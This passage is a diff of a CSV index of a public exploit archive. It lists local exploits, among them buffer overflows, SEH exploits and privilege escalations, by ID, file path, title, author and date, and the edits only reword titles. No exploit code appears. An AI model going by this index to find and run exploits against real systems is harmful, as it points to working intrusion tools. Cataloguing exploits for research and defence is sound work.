+33426,platforms/windows/local/33426.pl,"CyberLink Power2Go Essential 9.0.1002.0 - Registry Buffer Overflow (SEH Unicode)",2014-05-19,"Mike Czumak",windows,local,0 10084,platforms/windows/local/10084.txt,"Quick Heal 10.00 SP1 - Privilege Escalation",2009-10-13,"Maxim A. Kulakov",windows,local,0 10201,platforms/windows/local/10201.pl,"TEKUVA - Password Reminder Authentication Bypass",2009-11-21,iqlusion,windows,local,0 10207,platforms/multiple/local/10207.txt,"VMware Virtual 8086 - Linux Local Ring0 Exploit",2009-10-27,"Tavis Ormandy and Julien Tinnes",multiple,local,0 @@ -6655,12 +6655,12 @@ id,file,description,date,author,platform,type,port 10782,platforms/windows/local/10782.pl,"Mini-stream Ripper 3.0.1.1 - '.pls' Universal Buffer Overflow (Perl)",2009-12-29,jacky,windows,local,0 10786,platforms/windows/local/10786.py,"Soritong 1.0 - Universal Buffer Overflow (Python)",2009-12-29,jacky,windows,local,0 10787,platforms/windows/local/10787.py,"Mini-stream Ripper 3.0.1.1 - '.pls' Universal Buffer Overflow (Python)",2009-12-29,jacky,windows,local,0 -10797,platforms/windows/local/10797.py,"Quick Player 1.2 - Unicode Buffer Overflow",2009-12-30,mr_me,windows,local,0 -10827,platforms/windows/local/10827.rb,"DJ Studio Pro 5.1.6.5.2 - (SEH) Exploit",2009-12-30,"Sébastien Duquette",windows,local,0 +10797,platforms/windows/local/10797.py,"Quick Player 1.2 - Unicode Buffer Overflow (1)",2009-12-30,mr_me,windows,local,0 +10827,platforms/windows/local/10827.rb,"DJ Studio Pro 5.1.6.5.2 - Exploit (SEH)",2009-12-30,"Sébastien Duquette",windows,local,0 10936,platforms/windows/local/10936.c,"PlayMeNow (Windows XP SP2 French) - '.M3U' Playlist Buffer Overflow",2010-01-03,bibi-info,windows,local,0 11010,platforms/windows/local/11010.rb,"PlayMeNow 7.3/7.4 - Buffer Overflow (Metasploit)",2010-01-06,blake,windows,local,0 11029,platforms/multiple/local/11029.txt,"DirectAdmin 1.33.6 - Symlink Security Bypass",2010-01-06,alnjm33,multiple,local,0 -11046,platforms/windows/local/11046.py,"Quick Player 1.2 - Unicode Buffer Overflow (Bindshell)",2010-01-06,sinn3r,windows,local,0 +11046,platforms/windows/local/11046.py,"Quick Player 1.2 - Unicode Buffer Overflow (2)",2010-01-06,sinn3r,windows,local,0 11079,platforms/windows/local/11079.rb,"Audiotran 1.4.1 (Windows XP SP2/SP3 English) - Buffer Overflow",2010-01-10,"Sébastien Duquette",windows,local,0 11093,platforms/windows/local/11093.rb,"Soritong 1.0 - Universal Buffer Overflow (SEH) (Metasploit)",2010-01-10,fb1h2s,windows,local,0 11109,platforms/windows/local/11109.rb,"Audiotran 1.4.1 - '.pls' Stack Overflow (Metasploit)",2010-01-11,dookie,windows,local,0 @@ -6683,7 +6683,7 @@ id,file,description,date,author,platform,type,port 11255,platforms/windows/local/11255.pl,"Winamp 5.572 - 'whatsnew.txt' Stack Overflow",2010-01-25,Dz_attacker,windows,local,0 11256,platforms/windows/local/11256.pl,"Winamp 5.572 (Windows XP SP3 DE) - 'whatsnew.txt' Local Buffer Overflow",2010-01-25,NeoCortex,windows,local,0 11264,platforms/windows/local/11264.rb,"South River Technologies WebDrive Service 9.02 build 2232 - Bad Security Descriptor Privilege Escalation",2010-01-26,Trancer,windows,local,0 -11267,platforms/windows/local/11267.py,"Winamp 5.572 - (SEH) Exploit",2010-01-26,TecR0c,windows,local,0 +11267,platforms/windows/local/11267.py,"Winamp 5.572 - Exploit (SEH)",2010-01-26,TecR0c,windows,local,0 11281,platforms/windows/local/11281.c,"Rising AntiVirus 2008/2009/2010 - Privilege Escalation",2010-01-28,Dlrow,windows,local,0 11314,platforms/windows/local/11314.py,"CoreFTP 2.1 b1637 - (Password field) Universal Buffer Overflow",2010-02-02,mr_me,windows,local,0 11315,platforms/windows/local/11315.c,"DeepBurner pro 1.9.0.228 - '.dbr' file Buffer Overflow (Universal)",2010-02-02,"fl0 fl0w",windows,local,0 @@ -6733,7 +6733,7 @@ id,file,description,date,author,platform,type,port 12008,platforms/windows/local/12008.pl,"TugZip 3.5 Archiver - '.ZIP' File Buffer Overflow",2010-04-01,Lincoln,windows,local,0 12012,platforms/windows/local/12012.txt,"Free MP3 CD Ripper 2.6 - '.wav' Exploit",2010-04-02,"Richard leahy",windows,local,0 12024,platforms/windows/local/12024.php,"Zip Unzip 6.0 - '.zip' Stack Buffer Overflow (PoC)",2010-04-03,mr_me,windows,local,0 -12035,platforms/windows/local/12035.pl,"ZipScan 2.2c - (SEH) Exploit",2010-04-03,"Lincoln and corelanc0d3r",windows,local,0 +12035,platforms/windows/local/12035.pl,"ZipScan 2.2c - Exploit (SEH)",2010-04-03,"Lincoln and corelanc0d3r",windows,local,0 12051,platforms/windows/local/12051.php,"PHP 6.0 Dev - 'str_transliterate()' Buffer Overflow",2010-04-04,"Yakir Wizman",windows,local,0 12053,platforms/windows/local/12053.py,"ZipCentral - '.zip' File (SEH)",2010-04-04,TecR0c,windows,local,0 12059,platforms/windows/local/12059.pl,"eZip Wizard 3.0 - '.zip' File (SEH)",2010-04-04,"Lincoln and corelanc0d3r",windows,local,0 @@ -6744,7 +6744,7 @@ id,file,description,date,author,platform,type,port 12189,platforms/windows/local/12189.php,"PHP 6.0 Dev - 'str_transliterate()' Buffer Overflow (NX + ASLR Bypass)",2010-04-13,ryujin,windows,local,0 12213,platforms/windows/local/12213.c,"Micropoint ProActive Denfense 'Mp110013.sys' 1.3.10123.0 - Privilege Escalation",2010-04-14,MJ0011,windows,local,0 20109,platforms/windows/local/20109.rb,"Photodex ProShow Producer 5.0.3256 - load File Handling Buffer Overflow (Metasploit)",2012-07-27,Metasploit,windows,local,0 -12255,platforms/windows/local/12255.rb,"Winamp 5.572 - 'whatsnew.txt' (SEH) (Metasploit)",2010-04-16,blake,windows,local,0 +12255,platforms/windows/local/12255.rb,"Winamp 5.572 - 'whatsnew.txt' Exploit (SEH) (Metasploit)",2010-04-16,blake,windows,local,0 12261,platforms/windows/local/12261.rb,"Archive Searcher - '.zip' Stack Overflow",2010-04-16,Lincoln,windows,local,0 12293,platforms/windows/local/12293.py,"TweakFS 1.0 - (FSX Edition) Stack Buffer Overflow",2010-04-19,corelanc0d3r,windows,local,0 12326,platforms/windows/local/12326.py,"ZipGenius 6.3.1.2552 - 'zgtips.dll' Stack Buffer Overflow",2010-04-21,corelanc0d3r,windows,local,0 @@ -6767,14 +6767,14 @@ id,file,description,date,author,platform,type,port 12677,platforms/windows/local/12677.html,"Rumba FTP Client 'FTPSFtp.dll' 4.2.0.0 - 'OpenSession()' Buffer Overflow",2010-05-21,sinn3r,windows,local,0 12710,platforms/windows/local/12710.c,"Kingsoft Webshield 'KAVSafe.sys' 2010.4.14.609 (2010.5.23) - Kernel Mode Privilege Escalation",2010-05-23,"Xuanyuan Smart",windows,local,0 12803,platforms/windows/local/12803.html,"IP2location.dll 1.0.0.1 - Function 'Initialize()' Buffer Overflow",2010-05-30,sinn3r,windows,local,0 -12821,platforms/windows/local/12821.py,"Mediacoder 0.7.3.4672 - (SEH) Exploit",2010-05-31,Stoke,windows,local,0 +12821,platforms/windows/local/12821.py,"Mediacoder 0.7.3.4672 - Exploit (SEH)",2010-05-31,Stoke,windows,local,0 40335,platforms/windows/local/40335.txt,"ArcServe UDP 6.0.3792 Update 2 Build 516 - Unquoted Service Path Privilege Escalation",2016-09-05,sh4d0wman,windows,local,0 15499,platforms/windows/local/15499.py,"Free WMA MP3 Converter 1.1 - Buffer Overflow (SEH)",2010-11-12,Dr_IDE,windows,local,0 13756,platforms/windows/local/13756.py,"VUPlayer 2.49 - '.m3u' File Universal Buffer Overflow (DEP Bypass) (1)",2010-06-07,mr_me,windows,local,0 13760,platforms/windows/local/13760.py,"Audio Converter 8.1 - Stack Buffer Overflow (PoC)",2010-06-07,sud0,windows,local,0 13761,platforms/windows/local/13761.pl,"Easy CD-DA Recorder 2007 - Buffer Overflow (SEH)",2010-06-07,chap0,windows,local,0 13763,platforms/windows/local/13763.pl,"Audio Converter 8.1 - Stack Buffer Overflow (PoC) ROP/WPM",2010-06-07,sud0,windows,local,0 -13767,platforms/windows/local/13767.c,"SureThing CD Labeler (m3u/pls) - Unicode Stack Overflow (PoC)",2010-06-08,mr_me,windows,local,0 +13767,platforms/windows/local/13767.c,"SureThing CD Labeler - '.m3u/.pls' Unicode Stack Overflow (PoC)",2010-06-08,mr_me,windows,local,0 13768,platforms/php/local/13768.py,"Castripper 2.50.70 - '.pls' File Stack Buffer Overflow (DEP Bypass)",2010-06-08,mr_me,php,local,0 13806,platforms/windows/local/13806.txt,"ActivePerl 5.8.8.817 - Buffer Overflow",2010-06-09,PoisonCode,windows,local,0 13820,platforms/windows/local/13820.pl,"Power Tab Editor 1.7 (Build 80) - Buffer Overflow",2010-06-11,sud0,windows,local,0 @@ -6783,8 +6783,8 @@ id,file,description,date,author,platform,type,port 13907,platforms/windows/local/13907.py,"Winamp 5.572 - Local Buffer Overflow (EIP + SEH DEP Bypass)",2010-06-17,TecR0c,windows,local,0 13909,platforms/windows/local/13909.py,"Batch Audio Converter Lite Edition 1.0.0.0 - Stack Buffer Overflow (SEH)",2010-06-17,modpr0be,windows,local,0 13940,platforms/windows/local/13940.pl,"Orbital Viewer 1.04 - '.ov' Local Universal Stack Overflow (SEH)",2010-06-19,Crazy_Hacker,windows,local,0 -13942,platforms/windows/local/13942.pl,"MoreAmp - '.maf' Local Stack Buffer Overflow (SEH) (calc)",2010-06-20,Madjix,windows,local,0 -13998,platforms/windows/local/13998.pl,"BlazeDVD 6.0 - '.plf' File (SEH) Universal Buffer Overflow",2010-06-23,Madjix,windows,local,0 +13942,platforms/windows/local/13942.pl,"MoreAmp - '.maf' Local Stack Buffer Overflow (SEH)",2010-06-20,Madjix,windows,local,0 +13998,platforms/windows/local/13998.pl,"BlazeDVD 6.0 - '.plf' File Universal Buffer Overflow (SEH)",2010-06-23,Madjix,windows,local,0 14002,platforms/freebsd/local/14002.c,"FreeBSD Kernel - 'nfs_mount()' Exploit",2010-06-23,"Patroklos Argyroudis",freebsd,local,0 14029,platforms/windows/local/14029.py,"NO-IP.com Dynamic DNS Update Client 2.2.1 - 'Request' Insecure Encoding Algorithm",2010-06-24,sinn3r,windows,local,0 14044,platforms/windows/local/14044.pl,"WM Downloader 2.9.2 - Stack Buffer Overflow",2010-06-25,Madjix,windows,local,0 @@ -6800,7 +6800,7 @@ id,file,description,date,author,platform,type,port 14256,platforms/windows/local/14256.txt,"HP OpenView Network Node Manager (OV NNM) 7.53 - 'ovwebsnmpsrv.exe' Buffer Overflow (SEH)",2010-07-07,bitform,windows,local,0 14258,platforms/windows/local/14258.py,"GSM SIM Utility 5.15 - Local Exploit (Direct RET)",2010-07-07,chap0,windows,local,0 14339,platforms/linux/local/14339.sh,"Linux PAM 1.1.0 (Ubuntu 9.10/10.04) - MOTD File Tampering Privilege Escalation (2)",2010-07-12,anonymous,linux,local,0 -14352,platforms/windows/local/14352.rb,"ASX to MP3 Converter 3.1.2.1 - (SEH) Multiple OS ASLR + DEP Bypass (Metasploit)",2010-07-13,Node,windows,local,0 +14352,platforms/windows/local/14352.rb,"ASX to MP3 Converter 3.1.2.1 - Multiple OS ASLR + DEP Bypass (SEH) (Metasploit)",2010-07-13,Node,windows,local,0 14361,platforms/windows/local/14361.py,"Microsoft Excel - 0x5D record Stack Overflow (MS10-038)",2010-07-14,webDEViL,windows,local,0 14373,platforms/win_x86/local/14373.pl,"Mini-stream RM-MP3 Converter 3.1.2.1 - '.pls' Stack Buffer Overflow Universal",2010-07-16,Madjix,win_x86,local,0 14397,platforms/windows/local/14397.rb,"MoreAmp - Buffer Overflow (SEH) (Metasploit)",2010-07-17,Madjix,windows,local,0 @@ -6897,20 +6897,20 @@ id,file,description,date,author,platform,type,port 14959,platforms/windows/local/14959.py,"Acoustica MP3 Audio Mixer 2.471 - Extended .M3U Directives (SEH)",2010-09-09,"Carlos Mario Penagos Hollmann",windows,local,0 14961,platforms/win_x86/local/14961.py,"Audiotran 1.4.2.4 - Overflow (SEH)",2010-09-09,"Abhishek Lyall",win_x86,local,0 14982,platforms/windows/local/14982.py,"Adobe Acrobat and Reader - 'pushstring' Memory Corruption",2010-09-12,Abysssec,windows,local,0 -15013,platforms/windows/local/15013.pl,"MP3 Workstation 9.2.1.1.2 - (SEH) Exploit",2010-09-15,"sanjeev gupta",windows,local,0 +15013,platforms/windows/local/15013.pl,"MP3 Workstation 9.2.1.1.2 - Exploit (SEH)",2010-09-15,"sanjeev gupta",windows,local,0 15022,platforms/windows/local/15022.py,"Honestech VHS to DVD 3.0.30 Deluxe - Local Buffer Overflow (SEH)",2010-09-16,"Brennon Thomas",windows,local,0 15023,platforms/lin_x86-64/local/15023.c,"Linux Kernel < 2.6.36-rc4-git2 (x86-64) - 'ia32syscall' Emulation Privilege Escalation",2010-09-16,"ben hawkes",lin_x86-64,local,0 15024,platforms/lin_x86-64/local/15024.c,"Linux Kernel 2.6.27 < 2.6.36 (RedHat x86-64) - 'compat' Privilege Escalation",2010-09-16,Ac1dB1tCh3z,lin_x86-64,local,0 15026,platforms/windows/local/15026.py,"BACnet OPC Client - Buffer Overflow (1)",2010-09-16,"Jeremy Brown",windows,local,0 -15031,platforms/windows/local/15031.py,"DJ Studio Pro 8.1.3.2.1 - (SEH) Exploit",2010-09-17,"Abhishek Lyall",windows,local,0 +15031,platforms/windows/local/15031.py,"DJ Studio Pro 8.1.3.2.1 - Exploit (SEH)",2010-09-17,"Abhishek Lyall",windows,local,0 15033,platforms/windows/local/15033.py,"A-PDF All to MP3 Converter 1.1.0 - Universal Local (SEH)",2010-09-17,modpr0be,windows,local,0 15047,platforms/windows/local/15047.rb,"Audiotran 1.4.2.4 - Overflow (SEH) (DEP Bypass)",2010-09-19,"Muhamad Fadzil Ramli",windows,local,0 15099,platforms/windows/local/15099.rb,"SnackAmp 3.1.3B - SMP Buffer Overflow (SEH)",2010-09-24,"James Fitts",windows,local,0 15069,platforms/windows/local/15069.py,"Acoustica Audio Converter Pro 1.1 (build 25) - Heap Overflow (.mp3 / .wav / .ogg / .wma) (PoC)",2010-09-21,"Carlos Mario Penagos Hollmann",windows,local,0 15074,platforms/linux/local/15074.sh,"mountall 2.15.2 (Ubuntu 10.04/10.10) - Privilege Escalation",2010-09-21,fuzz,linux,local,0 -15081,platforms/windows/local/15081.rb,"MP3 Workstation 9.2.1.1.2 - (SEH) (Metasploit)",2010-09-22,Madjix,windows,local,0 +15081,platforms/windows/local/15081.rb,"MP3 Workstation 9.2.1.1.2 - Exploit (SEH) (Metasploit)",2010-09-22,Madjix,windows,local,0 15094,platforms/windows/local/15094.py,"Microsoft Excel - OBJ Record Stack Overflow",2010-09-24,Abysssec,windows,local,0 -15133,platforms/windows/local/15133.pl,"iworkstation 9.3.2.1.4 - (SEH) Exploit",2010-09-27,"sanjeev gupta",windows,local,0 +15133,platforms/windows/local/15133.pl,"iworkstation 9.3.2.1.4 - Exploit (SEH)",2010-09-27,"sanjeev gupta",windows,local,0 15134,platforms/windows/local/15134.rb,"Digital Music Pad 8.2.3.3.4 - Overflow (SEH) (Metasploit)",2010-09-27,"Abhishek Lyall",windows,local,0 15150,platforms/linux/local/15150.c,"Linux Kernel < 2.6.36-rc6 (RedHat / Ubuntu 10.04) - 'pktcdvd' Kernel Memory Disclosure (PoC)",2010-09-29,"Jon Oberheide",linux,local,0 15155,platforms/linux/local/15155.c,"XFS - Deleted Inode Local Information Disclosure",2010-09-29,"Red Hat",linux,local,0 @@ -6957,7 +6957,7 @@ id,file,description,date,author,platform,type,port 15693,platforms/windows/local/15693.html,"Viscom VideoEdit Gold ActiveX 8.0 - Remote Code Execution",2010-12-06,Rew,windows,local,0 15696,platforms/windows/local/15696.txt,"Alice 2.2 - Arbitrary Code Execution",2010-12-06,Rew,windows,local,0 15704,platforms/linux/local/15704.c,"Linux Kernel 2.6.37 (RedHat / Ubuntu 10.04) - 'Full-Nelson.c' Privilege Escalation",2010-12-07,"Dan Rosenberg",linux,local,0 -15706,platforms/windows/local/15706.txt,"Winamp 5.6 - Arbitrary Code Execution in MIDI Parser",2010-12-08,"Kryptos Logic",windows,local,0 +15706,platforms/windows/local/15706.txt,"Winamp 5.6 - 'MIDI Parser' Arbitrary Code Execution",2010-12-08,"Kryptos Logic",windows,local,0 15745,platforms/linux/local/15745.txt,"IBM Tivoli Storage Manager (TSM) - Privilege Escalation",2010-12-15,"Kryptos Logic",linux,local,0 15727,platforms/windows/local/15727.py,"FreeAmp 2.0.7 - '.m3u' Buffer Overflow",2010-12-11,zota,windows,local,0 15729,platforms/windows/local/15729.py,"PowerShell XP 3.0.1 - Buffer Overflow",2010-12-12,m_101,windows,local,0 @@ -6977,14 +6977,14 @@ id,file,description,date,author,platform,type,port 15901,platforms/windows/local/15901.py,"Music Animation Machine MIDI Player - Buffer Overflow (SEH)",2011-01-04,Acidgen,windows,local,0 15916,platforms/lin_x86/local/15916.c,"Linux Kernel < 2.6.34 (Ubuntu 10.10 x86) - 'CAP_SYS_ADMIN' Privilege Escalation (1)",2011-01-05,"Dan Rosenberg",lin_x86,local,0 15919,platforms/windows/local/15919.pl,"Enzip 3.00 - Buffer Overflow",2011-01-06,"C4SS!0 G0M3S",windows,local,0 -15934,platforms/windows/local/15934.py,"BS.Player 2.57 - Buffer Overflow (Unicode SEH)",2011-01-07,"C4SS!0 G0M3S",windows,local,0 +15934,platforms/windows/local/15934.py,"BS.Player 2.57 - Buffer Overflow (SEH Unicode)",2011-01-07,"C4SS!0 G0M3S",windows,local,0 15936,platforms/windows/local/15936.py,"VeryTools VideoSpirit Pro 1.68 - Local Buffer Overflow",2011-01-08,xsploitedsec,windows,local,0 15941,platforms/windows/local/15941.py,"Winamp 5.5.8 (in_mod plugin) - Stack Overflow (SEH)",2011-01-08,fdiskyou,windows,local,0 15944,platforms/linux/local/15944.c,"Linux Kernel < 2.6.34 (Ubuntu 10.10 x86/x64) - 'CAP_SYS_ADMIN' Privilege Escalation (2)",2011-01-08,"Joe Sylve",linux,local,0 15962,platforms/solaris/local/15962.c,"Linux Kernel (Solaris 10 / < 5.10 138888-01) - Privilege Escalation",2011-01-10,peri.carding,solaris,local,0 15972,platforms/windows/local/15972.c,"DriveCrypt 5.3 - Local Kernel Ring0 SYSTEM Exploit",2011-01-11,mu-b,windows,local,0 16264,platforms/windows/local/16264.pl,"Magic Music Editor - Buffer Overflow",2011-03-02,"C4SS!0 G0M3S",windows,local,0 -15975,platforms/windows/local/15975.py,"Nokia MultiMedia Player 1.0 - (SEH Unicode)",2011-01-11,"Carlos Mario Penagos Hollmann",windows,local,0 +15975,platforms/windows/local/15975.py,"Nokia MultiMedia Player 1.0 - Exploit (SEH Unicode)",2011-01-11,"Carlos Mario Penagos Hollmann",windows,local,0 15985,platforms/windows/local/15985.c,"Microsoft Win32k - Keyboard Layout (MS10-073)",2011-01-13,"Ruben Santamarta",windows,local,0 15994,platforms/windows/local/15994.rb,"eXtremeMP3 Player - Buffer Overflow (SEH)",2011-01-15,"C4SS!0 G0M3S",windows,local,0 16009,platforms/windows/local/16009.pl,"A-PDF All to MP3 Converter 2.0.0 - '.wav' Buffer Overflow",2011-01-18,h1ch4m,windows,local,0 @@ -7094,7 +7094,7 @@ id,file,description,date,author,platform,type,port 16977,platforms/windows/local/16977.pl,"ABBS Electronic Flash Cards 2.1 - '.fcd' Buffer Overflow",2011-03-14,h1ch4m,windows,local,0 16978,platforms/windows/local/16978.rb,"Foxit PDF Reader 4.2 - JavaScript File Write (Metasploit)",2011-03-14,Metasploit,windows,local,0 16991,platforms/windows/local/16991.txt,"Microsoft Source Code Analyzer for SQL Injection 1.3 - Improper Permissions",2011-03-17,LiquidWorm,windows,local,0 -16999,platforms/windows/local/16999.rb,"POP Peeper 3.7 - (SEH) Exploit",2011-03-18,"Anastasios Monachos",windows,local,0 +16999,platforms/windows/local/16999.rb,"POP Peeper 3.7 - Exploit (SEH)",2011-03-18,"Anastasios Monachos",windows,local,0 17001,platforms/windows/local/17001.pl,"CORE MultiMedia Suite 2011 CORE Player 2.4 - '.m3u' Buffer Overflow",2011-03-18,Rh0,windows,local,0 17012,platforms/windows/local/17012.py,"Mediacoder 2011 RC3 - '.m3u' Buffer Overflow",2011-03-20,"Oh Yaw Theng",windows,local,0 17013,platforms/windows/local/17013.pl,"MPlayer Lite r33064 - '.m3u' Overflow (SEH)",2011-03-20,"C4SS!0 and h1ch4m",windows,local,0 @@ -7149,7 +7149,7 @@ id,file,description,date,author,platform,type,port 17511,platforms/windows/local/17511.pl,"ZipGenius 6.3.2.3000 - '.zip' Buffer Overflow",2011-07-08,"C4SS!0 G0M3S",windows,local,0 40085,platforms/windows/local/40085.rb,"Microsoft Windows 7 SP1 - 'mrxdav.sys' WebDAV Privilege Escalation (MS16-016) (Metasploit)",2016-07-11,Metasploit,windows,local,0 17561,platforms/windows/local/17561.c,"Kingsoft AntiVirus 2012 'KisKrnl.sys' 2011.7.8.913 - Kernel Mode Privilege Escalation",2011-07-22,MJ0011,windows,local,0 -17563,platforms/windows/local/17563.py,"Download Accelerator Plus (DAP) 9.7 - '.M3U' File Buffer Overflow (Unicode SEH)",2011-07-23,"C4SS!0 G0M3S",windows,local,0 +17563,platforms/windows/local/17563.py,"Download Accelerator Plus (DAP) 9.7 - '.M3U' File Buffer Overflow (SEH Unicode)",2011-07-23,"C4SS!0 G0M3S",windows,local,0 17565,platforms/windows/local/17565.pl,"MPlayer Lite r33064 - '.m3u' Buffer Overflow (DEP Bypass)",2011-07-24,"C4SS!0 and h1ch4m",windows,local,0 17600,platforms/windows/local/17600.rb,"Zinf Audio Player 2.2.1 - '.pls' Buffer Overflow (DEP Bypass)",2011-08-03,"C4SS!0 and h1ch4m",windows,local,0 17604,platforms/windows/local/17604.rb,"ABBS Audio Media Player 3.0 - Buffer Overflow (Metasploit)",2011-08-04,"James Fitts",windows,local,0 @@ -7222,12 +7222,12 @@ id,file,description,date,author,platform,type,port 18334,platforms/windows/local/18334.py,"Microsoft Office 2003 Home/Pro - Code Execution (MS10-087)",2012-01-08,"b33f & g11tch",windows,local,0 18349,platforms/windows/local/18349.pl,"Blade API Monitor 3.6.9.2 - Unicode Stack Buffer Overflow",2012-01-10,FullMetalFouad,windows,local,0 18372,platforms/windows/local/18372.txt,"Microsoft Windows - Assembly Execution (MS12-005)",2012-01-14,"Byoungyoung Lee",windows,local,0 -18375,platforms/windows/local/18375.rb,"BS.Player 2.57 - Buffer Overflow (Unicode SEH) (Metasploit)",2012-01-17,Metasploit,windows,local,0 +18375,platforms/windows/local/18375.rb,"BS.Player 2.57 - Buffer Overflow (SEH Unicode) (Metasploit)",2012-01-17,Metasploit,windows,local,0 18366,platforms/windows/local/18366.rb,"Adobe Reader - U3D Memory Corruption (Metasploit)",2012-01-14,Metasploit,windows,local,0 18411,platforms/linux/local/18411.c,"Linux Kernel 2.6.39 < 3.2.2 (Gentoo / Ubuntu x86/x64) - 'Mempodipper' Privilege Escalation (1)",2012-01-23,zx2c4,linux,local,0 18471,platforms/windows/local/18471.c,"TORCS 1.3.2 - '.xml' File Buffer Overflow /SafeSEH Evasion",2012-02-08,"Andres Gomez and David Mora",windows,local,0 18500,platforms/windows/local/18500.py,"Blade API Monitor - Unicode Bypass (Serial Number) Buffer Overflow",2012-02-20,b33f,windows,local,0 -18501,platforms/windows/local/18501.rb,"DJ Studio Pro 5.1.6.5.2 - (SEH) (Metasploit)",2012-02-20,Death-Shadow-Dark,windows,local,0 +18501,platforms/windows/local/18501.rb,"DJ Studio Pro 5.1.6.5.2 - Exploit (SEH) (Metasploit)",2012-02-20,Death-Shadow-Dark,windows,local,0 18515,platforms/windows/local/18515.rb,"Orbit Downloader - URL Unicode Conversion Overflow (Metasploit)",2012-02-23,Metasploit,windows,local,0 18547,platforms/windows/local/18547.rb,"DJ Studio Pro 5.1 - '.pls' Stack Buffer Overflow (Metasploit)",2012-03-02,Metasploit,windows,local,0 18533,platforms/windows/local/18533.txt,"Socusoft Photo 2 Video 8.05 - Buffer Overflow",2012-02-27,Vulnerability-Lab,windows,local,0 @@ -7676,7 +7676,7 @@ id,file,description,date,author,platform,type,port 20333,platforms/unix/local/20333.c,"Exim Buffer 1.6.2/1.6.51 - Overflow Exploit",1997-07-21,"D. J. Bernstein",unix,local,0 20338,platforms/linux/local/20338.c,"Samba 2.0.7 - SWAT Symlink (1)",2000-11-01,Optyx,linux,local,0 20339,platforms/linux/local/20339.sh,"Samba 2.0.7 - SWAT Symlink (2)",2000-11-01,Optyx,linux,local,0 -20341,platforms/linux/local/20341.sh,"Samba 2.0.7 SWAT - Logfile Permissions",2000-11-01,miah,linux,local,0 +20341,platforms/linux/local/20341.sh,"Samba 2.0.7 - SWAT Logfile Permissions",2000-11-01,miah,linux,local,0 20377,platforms/freebsd/local/20377.c,"FreeBSD 3.5/4.x - top Format String",2000-11-01,truefinder,freebsd,local,0 20378,platforms/linux/local/20378.pl,"Debian top - Format String",2004-12-12,"Kevin Finisterre",linux,local,0 20380,platforms/unix/local/20380.c,"ManTrap 1.6.1 - Hidden Process Disclosure",2000-11-01,f8labs,unix,local,0 @@ -8314,7 +8314,7 @@ id,file,description,date,author,platform,type,port 26479,platforms/windows/local/26479.txt,"Zone Labs Zone Alarm 6.0 - Advance Program Control Bypass",2005-11-07,Tr0y-x,windows,local,0 26492,platforms/linux/local/26492.txt,"Emacs 2.1 - Local Variable Arbitrary Command Execution",2002-12-31,"Georgi Guninski",linux,local,0 26498,platforms/linux/local/26498.txt,"Sudo Perl 1.6.x - Environment Variable Handling Security Bypass",2005-11-11,"Charles Morris",linux,local,0 -26520,platforms/windows/local/26520.py,"Static HTTP Server 1.0 - (SEH) Overflow",2013-07-01,"Jacob Holcomb",windows,local,0 +26520,platforms/windows/local/26520.py,"Static HTTP Server 1.0 - Overflow (SEH)",2013-07-01,"Jacob Holcomb",windows,local,0 26523,platforms/windows/local/26523.rb,"AudioCoder (.lst) - Buffer Overflow (Metasploit)",2013-07-01,Asesino04,windows,local,0 26525,platforms/windows/local/26525.py,"Adrenalin Player 2.2.5.3 - '.wvx' Buffer Overflow (SEH)",2013-07-01,MrXors,windows,local,0 26554,platforms/windows/local/26554.rb,"Microsoft Windows - 'EPATHOBJ::pprFlattenRec' Privilege Escalation (Metasploit)",2013-07-02,Metasploit,windows,local,0 @@ -8412,7 +8412,7 @@ id,file,description,date,author,platform,type,port 29547,platforms/windows/local/29547.rb,"VideoSpirit Pro 1.90 - Buffer Overflow (SEH)",2013-11-12,metacom,windows,local,0 29528,platforms/php/local/29528.txt,"PHP 5.2 - FOpen 'Safe_mode' Restriction Bypass Exploit",2007-01-26,"Maksymilian Arciemowicz",php,local,0 29548,platforms/windows/local/29548.rb,"VideoSpirit Lite 1.77 - Buffer Overflow (SEH)",2013-11-12,metacom,windows,local,0 -29549,platforms/windows/local/29549.pl,"ALLPlayer 5.6.2 - '.m3u' File Local Buffer Overflow (Unicode SEH)",2013-11-12,"Mike Czumak",windows,local,0 +29549,platforms/windows/local/29549.pl,"ALLPlayer 5.6.2 - '.m3u' File Local Buffer Overflow (SEH Unicode)",2013-11-12,"Mike Czumak",windows,local,0 29594,platforms/windows/local/29594.txt,"Watermark Master 2.2.23 - '.wstyle' Buffer Overflow (SEH)",2013-11-14,"Mike Czumak",windows,local,0 29603,platforms/windows/local/29603.txt,"Comodo Firewall 2.3/2.4 - Flawed Component Control Cryptographic Hash",2007-02-15,"Matousec Transparent security",windows,local,0 29630,platforms/windows/local/29630.c,"Microsoft Windows XP/2003 - ReadDirectoryChangesW Information Disclosure",2007-02-22,3APA3A,windows,local,0 @@ -8422,9 +8422,9 @@ id,file,description,date,author,platform,type,port 29714,platforms/linux/local/29714.txt,"Linux Kernel 2.6.17 - 'Sys_Tee' Privilege Escalation",2007-03-05,"Michael Kerrisk",linux,local,0 29798,platforms/windows/local/29798.pl,"ALLPlayer 5.7 - '.m3u' UNICODE Buffer Overflow (SEH)",2013-11-24,"Mike Czumak",windows,local,0 29746,platforms/linux/local/29746.txt,"Horde Framework and IMP 2.x/3.x - Cleanup Cron Script Arbitrary File Deletion",2007-03-15,anonymous,linux,local,0 -29777,platforms/windows/local/29777.pl,"Light Alloy 4.7.3 - '.m3u' Buffer Overflow (SEH) 'UNICODE'",2013-11-22,"Mike Czumak",windows,local,0 +29777,platforms/windows/local/29777.pl,"Light Alloy 4.7.3 - '.m3u' Buffer Overflow (SEH Unicode)",2013-11-22,"Mike Czumak",windows,local,0 30783,platforms/windows/local/30783.py,"CCProxy 7.3 - Integer Overflow",2014-01-07,Mr.XHat,windows,local,0 -30154,platforms/windows/local/30154.pl,"GOM Player 2.2.53.5169 - Buffer Overflow (SEH) (.reg)",2013-12-09,"Mike Czumak",windows,local,0 +30154,platforms/windows/local/30154.pl,"GOM Player 2.2.53.5169 - '.reg' Buffer Overflow (SEH)",2013-12-09,"Mike Czumak",windows,local,0 30183,platforms/multiple/local/30183.txt,"Air Gallery 1.0 Air Photo Browser - Multiple Vulnerabilities",2013-12-10,Vulnerability-Lab,multiple,local,0 29799,platforms/windows/local/29799.pl,"Total Video Player 1.3.1 (Settings.ini) - Buffer Overflow (SEH)",2013-11-24,"Mike Czumak",windows,local,0 29801,platforms/php/local/29801.php,"PHP 5.2.1 - 'Session.Save_Path()' TMPDIR open_basedir Restriction Bypass",2007-03-28,"Stefan Esser",php,local,0 @@ -8696,7 +8696,7 @@ id,file,description,date,author,platform,type,port 36813,platforms/hardware/local/36813.txt,"ADB - Backup Archive File Overwrite Directory Traversal",2015-04-21,"Imre Rad",hardware,local,0 36819,platforms/windows/local/36819.pl,"MooPlayer 